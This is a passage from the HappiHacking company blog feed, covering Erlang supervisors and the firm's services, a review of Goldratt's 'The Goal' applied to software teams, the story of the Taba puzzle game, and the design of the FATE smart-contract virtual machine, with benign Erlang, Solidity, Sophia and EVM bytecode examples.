&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/Clean_desk_MacBook_with_Erlang.png&quot; alt=&quot;A computer with Erlang.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A computer with Erlang.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;When it comes to technology, our go-to tool is Erlang. If we cannot use Erlang, we are also well-versed in most other programming languages, and we can take the Erlang philosophy with us to any environment.&lt;/p&gt;
&lt;p&gt;Erlang comes with a set of tools and principles that make it easier to build robust, scalable, and maintainable applications. One of these principles is the idea of supervisors and independent processes.&lt;/p&gt;
&lt;p&gt;In Erlang, a supervisor is a process that monitors other processes, known as worker processes. If a worker process encounters an error and crashes, the supervisor automatically restarts it. This means that even if a part of your system fails, the rest of it can continue to function normally. It&#39;s like having a safety net that catches you when you fall, allowing you to get back up and continue on your path.&lt;/p&gt;
&lt;p&gt;This ties in beautifully with the Happy Path Method. When you&#39;re focusing on the happy path, you&#39;re focusing on the core functionality that delivers the most value. But what happens if an error occurs? That&#39;s where Erlang&#39;s supervisors come in. They ensure that even if a part of your system encounters an error, it doesn&#39;t derail your entire process. You can continue focusing on the happy path, knowing that the supervisors have got your back.&lt;/p&gt;
&lt;p&gt;Moreover, Erlang&#39;s support for independent processes means that different parts of your system can operate concurrently and independently. If one process encounters an issue, it doesn&#39;t affect the others. This means you can continue delivering value through the other parts of your system, even when facing challenges.&lt;/p&gt;
&lt;p&gt;In essence, Erlang and OTP provide a technical framework that supports the Happy Path Method. They allow you to focus on delivering value, without getting bogged down by errors or failures. They provide the resilience and reliability that let you keep your eyes on the prize - the happy path that leads to business success. At HappiHacking, we leverage these tools to help our clients navigate their path to success, one happy step at a time.&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/logo_with_sun.jpg&quot; alt=&quot;Part of the HappiHacking logo.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;Part of the HappiHacking logo.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;As for our services at HappiHacking, we&#39;re not just about coding. We&#39;re about creating solutions. We&#39;re about understanding your business needs and translating them into technology. We&#39;re about leveraging our expertise in Erlang, Elixir, Java, testing, DevOps, and other technologies to deliver solutions that are tailor-made for your business. From system architecture and design, to development and code reviews, we&#39;ve got you covered. We&#39;re not just service providers; we&#39;re your partners in growth.&lt;/p&gt;
&lt;p&gt;The next time you think about technology, remember - it&#39;s not just about the code. It&#39;s about the people who make the code work. It&#39;s about the methods that make the journey enjoyable.&lt;/p&gt;
&lt;p&gt;So, yes, it&#39;s never about technology - until it is. We must always remember the human problems we&#39;re solving, but we can&#39;t ignore the technology that helps us solve them. It&#39;s a delicate balance, a dance between two seemingly opposing forces. But when we get it right, when we find that sweet spot between problem and solution, between human and technology, that&#39;s when we create something truly remarkable.&lt;/p&gt;
&lt;p&gt;When it comes to choosing a technology partner who understands your needs and delivers solutions that drive growth, choose wisely - choose HappiHacking!&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: right;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/crazy_happy_happi.jpg&quot; alt=&quot;A Happy Happi.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A Happy Happi.&quot; /&gt; &lt;/div&gt;
</content>
  </entry>
  
  <entry>
    <title>Book Review &quot;The Goal - A Process of Ongoing Improvement&quot; by Eliyahu M. Goldratt and Jeff Cox</title>
    <link href="https://happihacking.com/blog/posts/2023/the_goal/"/>
    <updated>2023-06-02T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/the_goal/</id>
    <summary>Unleashing the Power of the Theory of Constraints on Software Development</summary>
    <content type="html">&lt;p&gt;Book Review “The Goal: A Process of Ongoing Improvement&amp;quot; by Eliyahu M. Goldratt and Jeff Cox&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/chess.jpg&quot; alt=&quot;A chess board.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A chess board.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;I am constantly reading and trying to learn new things. Since I started counting, in 2014, I have read over 400 books. One of the best ones I read recently, even though it is almost as old as I am, is The Goal.&lt;/p&gt;
&lt;p&gt;In The Goal, the authors introduce the Theory of Constraints as a management philosophy, in the form of a novel. This makes it much more engaging and easier to understand than traditional business or management books. The story of Alex Rogo and his struggling plant helps me to relate to the concepts on a personal level. I especially enjoyed the 30th-anniversary audiobook edition with several voice actors.&lt;/p&gt;
&lt;p&gt;The book introduces the Theory of Constraints (TOC), an at the time revolutionary management philosophy, that focuses on improving overall system performance by identifying and managing the system&#39;s constraints. This concept has been widely adopted in various fields, including manufacturing, project management, and software development.&lt;/p&gt;
&lt;p&gt;The book is written as a story about a man named Alex Rogo.
Imagine you&#39;re playing a game, but you&#39;re not sure what the goal is. You&#39;d be confused, right? That&#39;s how Alex Rogo, the main character in &amp;quot;The Goal&amp;quot;, felt about his job. He was running a big factory, but things weren&#39;t going well. The factory was losing money, and if Alex couldn&#39;t fix it, everyone would lose their jobs.&lt;/p&gt;
&lt;p&gt;One day, Alex ran into his old physics teacher, Jonah. Jonah had a different way of looking at things. He told Alex that every big system, like a factory, has one part that slows everything else down. This slow part is called a &amp;quot;constraint&amp;quot;. Jonah said that instead of trying to make every part of the factory work faster, Alex should focus on making the constraint work better.&lt;/p&gt;
&lt;p&gt;Alex thought about what Jonah said and realized that one machine in his factory was slower than the others and was holding everything up. So, he and his team changed the way they worked to make sure this machine was always busy. And guess what? It worked! The factory started making money again, and everyone&#39;s jobs were saved.&lt;/p&gt;
&lt;p&gt;The book also uses the Socratic Method; rather than directly telling Alex the solutions, Jonah asks probing questions that lead Alex to discover the answers on his own. This method not only provides solutions to problems but also fosters learning, critical thinking, and problem-solving skills.&lt;/p&gt;
&lt;p&gt;While the book is set in a manufacturing context, the principles it introduces are relevant to any system or process. This has made the book popular not just among manufacturing professionals, but also among professionals in fields like software development, IT operations, project management, and more.&lt;/p&gt;
&lt;p&gt;Despite being published in the 1980s, the principles introduced in &amp;quot;The Goal&amp;quot; remain relevant today. In a world where efficiency and throughput are key to competitive advantage, the focus on managing constraints to improve overall system performance is more relevant than ever.&lt;/p&gt;
&lt;p&gt;The book also presents a problem-solving methodology called “The five focusing steps”, also known as the process of ongoing improvement. The five steps are designed to identify and manage bottlenecks in order to improve process throughput. Here are the steps:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Identify the system&#39;s constraint(s)&lt;/strong&gt;: Determine the part of the system that is slowing down the entire process. This could be a machine in a factory, a step in a process, or any other factor that limits the system&#39;s output.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Decide how to exploit the system&#39;s constraint(s)&lt;/strong&gt;: Figure out how to get the most out of the constraint without increasing its capacity. This could involve reducing downtime, improving scheduling, or eliminating inefficiencies.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Subordinate everything else to the above decision(s)&lt;/strong&gt;: Align the entire system to support the constraint. This could involve adjusting schedules, processes, or policies to ensure that the constraint is always working at full capacity.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Elevate the system&#39;s constraint(s)&lt;/strong&gt;: If the constraint still limits the system&#39;s output after the above steps, consider ways to increase its capacity. This could involve investing in new equipment, hiring more staff, or other actions that increase the constraint&#39;s throughput.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;If a constraint has been broken, go back to step 1&lt;/strong&gt;. Don&#39;t let inertia become the system&#39;s constraint: Once a constraint is resolved, another part of the system will become the new constraint. The process then repeats, leading to continuous improvement.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These steps provide a systematic approach to improving a system&#39;s output by focusing on its constraints. They can be applied to any system or process, from a manufacturing plant to a software development process.&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/hh_on_water.jpg&quot; alt=&quot;The HappiHacking team Kayaking.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;The HappiHacking team Kayaking.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;&amp;quot;The Goal&amp;quot; and the Theory of Constraints (TOC) provide valuable insights that can be applied to software development. Here are some key takeaways and their applications:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Identify the Constraint&lt;/strong&gt;: In software development, a constraint could be a particular piece of code, a development process, or even a team member. It&#39;s important to identify what is slowing down the development process. This could be done through retrospectives, performance metrics, or simply by asking team members about their challenges. In my experience, the process itself is often the constraint. Forcing developers to spend time estimating tasks, and imposing arbitrary sprint cycles that break up the flow and productivity of a team, is most often a real waste of time.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Another common constraint can be the build, test, and release process. Make sure this is streamlined.&lt;/p&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Exploit the Constraint&lt;/strong&gt;: Once the constraint is identified, find ways to make the most of it. This could involve optimizing a piece of code, improving a development process, or providing additional support to a team member. If, for example, corporate rules force the team to work in sprints and do estimates, make sure that as little time as possible is spent on this.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Subordinate and Synchronize&lt;/strong&gt;: Adjust the rest of the system to support the constraint. This could involve changing the order in which tasks are done, reallocating resources, or adjusting schedules to ensure that the constraint is not being held up by other parts of the system.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Elevate the Constraint&lt;/strong&gt;: If the constraint is still a bottleneck, consider ways to increase its capacity. This could involve investing in better tools, providing additional training, or changing the process.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Repeat the Process&lt;/strong&gt;: Once a constraint is resolved, another will appear. Continuous improvement involves repeating this process to identify and address new constraints. Even though I am not a big fan of all the rituals of Scrum, I think it is a good idea to have something like a retrospective every now and then to keep improving.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In addition to these steps, &amp;quot;The Goal&amp;quot; also emphasizes the importance of viewing the system as a whole. In software development, this means looking beyond individual tasks or team members and considering how everything works together. This holistic view can help to identify systemic issues and opportunities for improvement.&lt;/p&gt;
&lt;p&gt;Finally, &amp;quot;The Goal&amp;quot; promotes a culture of learning and adaptation. In software development, the ability to learn from mistakes and adapt to new technologies and methodologies is crucial.&lt;/p&gt;
&lt;p&gt;The most important lesson in the book is that The Goal of any business is to make money. It is easy to lose focus on this and instead focus on improving processes and output, but if the output doesn’t improve the bottom line, then the whole exercise is pointless. Always make sure you are working on the most important thing to increase revenue or profit, then try to do this as efficiently as possible.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Taba the story</title>
    <link href="https://happihacking.com/blog/posts/2023/taba_story/"/>
    <updated>2023-06-01T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/taba_story/</id>
    <content type="html">&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/taba_0_0_1.jpg&quot; alt=&quot;The Taba game on a chess board.&quot; title=&quot;The Taba game on a chess board.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;In 2017, we embarked on a journey to build a blockchain named Aeternity. We used Erlang and developed a virtual machine called Fate, along with a programming language named Sophia.&lt;/p&gt;
&lt;p&gt;You can read more about Fate in another &lt;a href=&quot;https://happihacking.com/blog/posts/2023/fate/&quot;&gt;post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As a fun application to test on the chain, we built a game contract.&lt;/p&gt;
&lt;p&gt;The idea was that the game begins when a player calls the start function in the contract at height H. Other players have until height H+1000 to place a bet. At height H+1001, players can call the contract to get a seed from the H+1000 block hash. Players can then view the game in their app, solve it, and push the number of moves and a hash of the solution to the contract. At height H+2000, a player can claim the winnings by sending in their solution. The player who first produced the shortest correct solution wins and gets the tokens.&lt;/p&gt;
&lt;p&gt;But since this was a bit too close to gambling we decided to never
publish the contract or the game.&lt;/p&gt;
&lt;p&gt;Instead, we rewrote the game in Erlang and JavaScript.
In this version we used some fantastic Creative Commons graphics to enhance the game&#39;s visual appeal.&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/old_sliding.png&quot; alt=&quot;The Taba game with not so nice graphics.&quot; title=&quot;The Taba game with not so nice graphics.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;For the Erlang server we used the Cowboy web server with a worker pool. Each worker handles one request. For single-player mode, we used a REST API and serialized through the database. For multiplayer mode, we used a WebSocket API and serialized in a gen_server (one per game) with state backed to the database.&lt;/p&gt;
&lt;p&gt;Then we developed a solver in C to find solutions for the puzzles. The solver is capable of finding the optimal solution, which we use to calculate the difficulty of each puzzle.&lt;/p&gt;
&lt;p&gt;Our designer, Johannes, created more appealing graphics for the game, and we rewrote the frontend in Dart and Flutter. Puzzles are generated using a pseudo-random number generator implemented in all involved languages (Erlang, JavaScript, Dart, Java).&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/sliding_v2.png&quot; alt=&quot;The Taba game with better graphics.&quot; title=&quot;The Taba game with better graphics.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;The game is very easy to pick up and play. It is available for download for free on the App Store and Google Play. The current version of the game boasts over 19 quintillion puzzles to solve, with new features being added regularly.&lt;/p&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/taba_1_0.png&quot; alt=&quot;The Taba game with nice graphics.&quot; title=&quot;The Taba game with nice graphics.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;The game is hosted at &lt;a href=&quot;https://www.taba.quest/&quot;&gt;Taba Quest&lt;/a&gt; where you can read more about it.&lt;/p&gt;
&lt;p&gt;Or you can just &lt;a href=&quot;https://www.taba.quest/go_to_store/&quot;&gt;download it&lt;/a&gt;,
but don&#39;t blame me if all your free time suddenly is gone.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>FATE: Revolutionizing Smart Contract Execution</title>
    <link href="https://happihacking.com/blog/posts/2023/fate/"/>
    <updated>2023-05-31T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/fate/</id>
    <summary>Enhancing Efficiency and Safety in Blockchain Applications</summary>
    <content type="html">&lt;h2 id=&quot;introduction&quot; tabindex=&quot;-1&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Smart contracts serve as the building blocks for decentralized applications. At HappiHacking, we had
the privilege of collaborating with æternity, a blockchain platform built on the BEAM in
Erlang. Together, we embarked on a mission to develop a virtual machine that would revolutionize
smart contract execution. This blog post takes you through our journey and highlights the key
features of FATE (Fast æternity Transaction Engine), an innovative solution that enhances efficiency
and safety in blockchain applications.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/city_dragon.png&quot; alt=&quot;A city in the night.&quot; title=&quot;A city in the night.&quot; /&gt;
&lt;h2 id=&quot;the-genesis-of-fate&quot; tabindex=&quot;-1&quot;&gt;The Genesis of FATE&lt;/h2&gt;
&lt;p&gt;HH (HappiHacking) was approached by æternity who were building a blockchain on the BEAM in Erlang.
They wanted to have a virtual machine to execute smart contracts on their new blockchain.&lt;/p&gt;
&lt;p&gt;We were invited to a meetup with the development team in Sofia, Bulgaria two weeks later. Neither
I nor Tobias knew anything about blockchains at the time. So I sat down with the Ethereum &amp;quot;yellow
paper&amp;quot; (sic!) to learn something about the technology. In order to really understand the Ethereum
virtual machine, the EVM, I implemented a version of it in Erlang. I called this VM &amp;quot;AEVM&amp;quot;, for the
æternity Ethereum Virtual Machine.&lt;/p&gt;
&lt;p&gt;Tobias and I were very excited to go to Sofia and learn everything about blockchains from the
development team. After a few intensive days of discussions, we realized that blockchain
technology was in its infancy: no one knew that much about the technology, how to
implement it, or even which features to implement.&lt;/p&gt;
&lt;p&gt;When I showed the team my AEVM implementation, everyone was impressed and we got a very central
position in the æternity core team.&lt;/p&gt;
&lt;h3 id=&quot;taking-the-lead-in-technical-decisions&quot; tabindex=&quot;-1&quot;&gt;Taking the Lead in Technical Decisions&lt;/h3&gt;
&lt;p&gt;For the next two years, Tobias and I led many of the technical decisions and coded much of the core
of æternity. When the main features of the blockchain were implemented, we started thinking about how
to really design a virtual machine for the blockchain.&lt;/p&gt;
&lt;h3 id=&quot;identifying-the-vision-for-smart-contracts&quot; tabindex=&quot;-1&quot;&gt;Identifying the Vision for Smart Contracts&lt;/h3&gt;
&lt;p&gt;We identified a number of properties we saw or wanted to see in Smart Contracts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Short run time&lt;/li&gt;
&lt;li&gt;Deterministic&lt;/li&gt;
&lt;li&gt;Reusable&lt;/li&gt;
&lt;li&gt;Easy to understand and verify&lt;/li&gt;
&lt;li&gt;Easy access to æternity specific features (Oracles, Contracts, Channels)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;challenges-with-existing-solutions&quot; tabindex=&quot;-1&quot;&gt;Challenges with Existing Solutions&lt;/h3&gt;
&lt;p&gt;We also saw a number of problems with the design of Solidity, the Ethereum smart contract language,
and the design of the EVM, which also affected the AEVM. The EVM was modeled after a computer: it had stack
slots, memory addresses, a fixed word length, and arithmetic that could overflow or silently fail.&lt;/p&gt;
&lt;h3 id=&quot;the-solution-sophia-and-fate&quot; tabindex=&quot;-1&quot;&gt;The Solution -- Sophia and FATE&lt;/h3&gt;
&lt;p&gt;To address these challenges and create a superior smart contract execution environment, we developed
the Sophia programming language. Sophia embodies the following principles:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Static Typing: Sophia is statically typed, ensuring type safety and reducing common programming
errors.&lt;/li&gt;
&lt;li&gt;Concurrency Control: While allowing parallelism, Sophia avoids true concurrency, simplifying
execution and enhancing safety.&lt;/li&gt;
&lt;li&gt;Well-Defined Errors: Sophia incorporates comprehensive error handling mechanisms, providing clear
and unambiguous error messages to developers.&lt;/li&gt;
&lt;li&gt;Safety Focus: With Sophia, safety is prioritized through design choices that prevent
vulnerabilities and protect against attacks.&lt;/li&gt;
&lt;li&gt;Blockchain Integration: Sophia is closely integrated with the æternity blockchain, offering
seamless access to its unique features.&lt;/li&gt;
&lt;li&gt;Data Structure Efficiency: Sophia emphasizes well-defined serialization and storage mechanisms,
eliminating unnecessary complexities.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We also designed FATE (the Fast æternity Transaction Engine), a type-safe, high-level virtual
machine for smart contracts. FATE is highly optimized for Sophia and the æternity blockchain, and it
is the culmination of our efforts, embodying the principles outlined above.&lt;/p&gt;
&lt;h4&gt;No Memory Limit&lt;/h4&gt;
&lt;p&gt;FATE removes the traditional memory limit found in other virtual machines. Instead, it introduces
gas control to manage the execution of smart contracts. Gas acts as a resource limit and ensures
that computations within smart contracts do not exceed the available resources. By removing the
memory limit, FATE offers more flexibility in executing complex computations without being
restricted by memory constraints.&lt;/p&gt;
&lt;h4&gt;Gas Controlled&lt;/h4&gt;
&lt;p&gt;Gas control is a fundamental aspect of the FATE virtual machine. Each operation and computation
within a smart contract consumes a specific amount of gas. The gas consumption determines the cost
of executing the contract. Gas control ensures that smart contracts are executed within the
specified resource limits and prevents malicious or computationally expensive code from monopolizing
the system. By incorporating gas control, FATE promotes fair resource allocation and efficient
contract execution.&lt;/p&gt;
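&lt;p&gt;The gas mechanics can be sketched in a few lines of Erlang. The following is a hypothetical illustration, not the actual FATE implementation: each instruction carries a cost, and execution aborts with an out-of-gas error when the budget is exhausted.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Hypothetical sketch of gas metering -- not the actual FATE code.
-module(gas_sketch).
-export([eval/2]).

cost(add)    -&gt; 3;
cost(mstore) -&gt; 10;
cost(_)      -&gt; 1.

%% Run a list of instructions against a gas budget.
eval([], Gas) -&gt;
    {ok, Gas};                        %% leftover gas can be refunded
eval([Op | Rest], Gas) -&gt;
    case Gas - cost(Op) of
        Left when Left &gt;= 0 -&gt; eval(Rest, Left);
        _ -&gt; {error, out_of_gas}      %% abort: budget exhausted
    end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With this model, &lt;code&gt;eval([add, mstore, add], 20)&lt;/code&gt; succeeds with gas to spare, while the same program under a budget of 10 aborts deterministically instead of monopolizing the node.&lt;/p&gt;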
&lt;h4&gt;No Concurrency (Parallelism Possible)&lt;/h4&gt;
&lt;p&gt;FATE operates without native support for concurrency. While individual contracts run sequentially,
the absence of concurrency within a single contract enhances determinism and simplifies contract
development, testing, and debugging. External parallelism can be achieved by executing multiple
contracts or transactions concurrently, leveraging the inherent scalability of the underlying
blockchain network.&lt;/p&gt;
&lt;h4&gt;Statically Typed (No Floats)&lt;/h4&gt;
&lt;p&gt;FATE employs static typing, which provides enhanced safety and predictability in smart contract
development. Static typing requires variables and data types to be explicitly declared and verified
at compile-time. This approach eliminates common type-related errors and improves code
correctness. Additionally, FATE avoids the use of floating-point numbers, which can introduce
complexities and potential precision issues. By adhering to a statically typed model and excluding
floats, FATE enhances contract reliability and predictability.&lt;/p&gt;
&lt;h4&gt;Well Defined Errors&lt;/h4&gt;
&lt;p&gt;FATE ensures well-defined errors during contract execution. This feature helps developers identify
and handle exceptions, errors, and invalid operations within their contracts. Clear error messages
and exception handling mechanisms enable efficient debugging and troubleshooting, facilitating the
development process and enhancing contract robustness.&lt;/p&gt;
&lt;h4&gt;Close Integration to Blockchain&lt;/h4&gt;
&lt;p&gt;FATE is designed for close integration with the blockchain it operates on, such as the æternity
blockchain. This integration allows seamless interaction between smart contracts and the underlying
blockchain infrastructure. FATE leverages æternity-specific features, such as oracles, contracts,
and channels, to enable efficient and secure communication, data exchange, and execution of
blockchain-based applications.&lt;/p&gt;
&lt;h4&gt;Stack-Based&lt;/h4&gt;
&lt;p&gt;FATE follows a stack-based execution model, where operations are performed on a stack of data
elements. This model simplifies the execution process and enables efficient memory management. The
stack-based approach allows for compact bytecode representation and optimized execution, making FATE
well-suited for resource-constrained environments like blockchain networks.&lt;/p&gt;
&lt;h4&gt;Well Defined Serialization&lt;/h4&gt;
&lt;p&gt;Serialization refers to the process of converting data structures or objects into a format suitable
for storage or transmission. FATE ensures well-defined serialization mechanisms, which enable
efficient and reliable serialization of data within smart contracts. This feature is crucial for a
blockchain, which depends on determinism.&lt;/p&gt;
&lt;p&gt;By incorporating these features, FATE provides a powerful and efficient execution environment for
smart contracts. Its gas control, stack-based execution, well-defined errors, and close integration
with the blockchain contribute to the secure and reliable execution of contracts on the æternity
blockchain. Developers can leverage FATE&#39;s features to build sophisticated, deterministic, and
high-performing applications on the blockchain.&lt;/p&gt;
&lt;p&gt;FATE has the following built-in types in the virtual machine language:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-haskell&quot;&gt;-- FATE types
Integer -- signed arbitrary precision integers
Boolean -- (true | false)
Address -- A pointer into the state tree
Contract | Oracle | Oracle_query | Channel
String -- utf8 encoded byte arrays
Bytes
Tuple (), (&#39;a), (&#39;a, &#39;b, ...)
List -- Cons cells (&#39;a) | Nil
Map (&#39;a, &#39;b) -- (Key: &#39;a -&gt; Value: &#39;b), where &#39;a is not a map
Variant (| [Sizes] | Tag | Elements |)
Bits
TypeRep
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In a blockchain virtual machine, such as FATE, the design choices regarding code structure, code
addresses, and data size play a crucial role in ensuring the integrity, security, and efficiency of
smart contract execution within the blockchain ecosystem. We decided to have no memory addresses in
FATE to make it impossible to trick the VM into executing the wrong code. Instead we have the following
design:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Basic Blocks (BB): The code structure is organized into Basic Blocks. A Basic Block is a sequence
of instructions that can be executed without interruption. By dividing the code into Basic
Blocks, the VM can optimize the execution process, handle control flow efficiently, and provide
better security and auditing capabilities.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Absence of code/instruction addresses: In FATE, there are no specific addresses assigned to code
instructions. This is primarily done to enhance security and prevent arbitrary code jumps or
modifications. By removing direct access to code memory addresses, the VM ensures that the
execution of smart contracts follows a predefined and controlled path, reducing the risk of
malicious or unauthorized code manipulation.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Function-centric code organization: Each function within a smart contract has its own code. This
separation allows for modularity and encapsulation of functionality. It enables efficient code
reuse, improves readability, and simplifies the debugging and maintenance processes. Moreover, by
isolating functions, the VM can manage resources and handle function calls in a structured and
controlled manner.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Unspecified data size: FATE does not impose a predetermined size for data. This flexibility is
essential to accommodate varying data requirements of different smart contracts. It allows for
the storage and manipulation of data structures of different sizes, ranging from small integers
to large arrays or complex objects. By not limiting the data size, the VM promotes versatility
and adaptability in smart contract development. It also removes all possible overflow bugs and
attacks.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;No defined word size: Unlike traditional computer architectures, FATE does not enforce a fixed
word size for instructions or data. This design choice grants flexibility to the VM
implementation, allowing it to optimize memory usage and adapt to the specific requirements of
the blockchain platform. It enables efficient storage and processing of data without unnecessary
overhead or constraints imposed by fixed word sizes. This also removes all possible overflow bugs
and attacks.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Flexible data storage: The implementation of FATE has the freedom to choose how data is
stored. This flexibility ensures that the VM can utilize the most suitable data structures and
storage mechanisms for the given platform. It enables efficient data retrieval, manipulation, and
persistence while considering factors such as storage cost, access speed, and compatibility with
the underlying infrastructure.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Absence of word size or byte size addresses to memory: In FATE, memory addresses are not defined
based on word size or byte size. This design decision allows for a more abstract and agnostic
representation of memory, decoupling it from specific hardware architectures. It enables the VM
to handle memory operations in a platform-independent manner, promoting compatibility and
portability.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Overall, these design choices aim to strike a balance between security, efficiency, flexibility, and
compatibility. By carefully considering the unique requirements and constraints of blockchain
systems, the VM can provide a reliable and robust execution environment for smart contracts,
fostering trust, transparency, and decentralized application development.&lt;/p&gt;
&lt;p&gt;Let us look at some code examples. Here is a simple Solidity (the default language of Ethereum and
EVM) contract with just an identity function.&lt;/p&gt;
&lt;p&gt;Solidity&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-sol&quot;&gt;// Solidity
pragma solidity ^0.5.11;

contract Identity {
    function id(int256 X) public pure returns (int256) {
        return X;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the same contract in Sophia.&lt;/p&gt;
&lt;p&gt;Sophia&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-sol&quot;&gt;// Sophia
contract Identity =
  payable entrypoint main (x : int) = x
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note how much shorter even such a simple contract is, and that in Solidity you also have to specify
the word size of your integer.&lt;/p&gt;
&lt;p&gt;If we compile the Solidity Identity to the Ethereum Virtual Machine (EVM) assembly language we get a
quite large program:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-wasm&quot;&gt; PUSH1 0x80 PUSH1 0x40 MSTORE CALLVALUE DUP1 ISZERO
 PUSH1 0xF JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST POP
 PUSH1 0xAB DUP1 PUSH2 0x1E PUSH1 0x0 CODECOPY PUSH1 0x0
 RETURN INVALID PUSH1 0x80 PUSH1 0x40 MSTORE CALLVALUE
 DUP1 ISZERO PUSH1 0xF JUMPI PUSH1 0x0 DUP1 REVERT
 JUMPDEST POP PUSH1 0x4 CALLDATASIZE LT PUSH1 0x28
 JUMPI PUSH1 0x0 CALLDATALOAD PUSH1 0xE0 SHR DUP1
 PUSH4 0x1A94D83E EQ PUSH1 0x2D JUMPI JUMPDEST
 PUSH1 0x0 DUP1 REVERT JUMPDEST PUSH1 0x56 PUSH1 0x4
 DUP1 CALLDATASIZE SUB PUSH1 0x20 DUP2 LT ISZERO
 PUSH1 0x41 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2
 ADD SWAP1 DUP1 DUP1 CALLDATALOAD SWAP1 PUSH1 0x20 ADD
 SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP PUSH1 0x6C JUMP
 JUMPDEST PUSH1 0x40 MLOAD DUP1 DUP3 DUP2 MSTORE
 PUSH1 0x20 ADD SWAP2 POP POP PUSH1 0x40 MLOAD DUP1
 SWAP2 SUB SWAP1 RETURN JUMPDEST PUSH1 0x0 DUP2 SWAP1
 POP SWAP2 SWAP1 POP JUMP INVALID LOG2 PUSH6
 0x627A7A723158 KECCAK256 0xc2 0xb9 0xdf 0xb0 0xc8
 0xdf 0xf6 SWAP14 SWAP14 0xe9 0x46 0xcd PUSH17
 0x1D21108C0786A26266D0F114ADBF024CDE 0x4b 0xd1
 PUSH5 0x736F6C6343 STOP SDIV SIGNEXTEND STOP ORIGIN
&lt;/code&gt;&lt;/pre&gt;
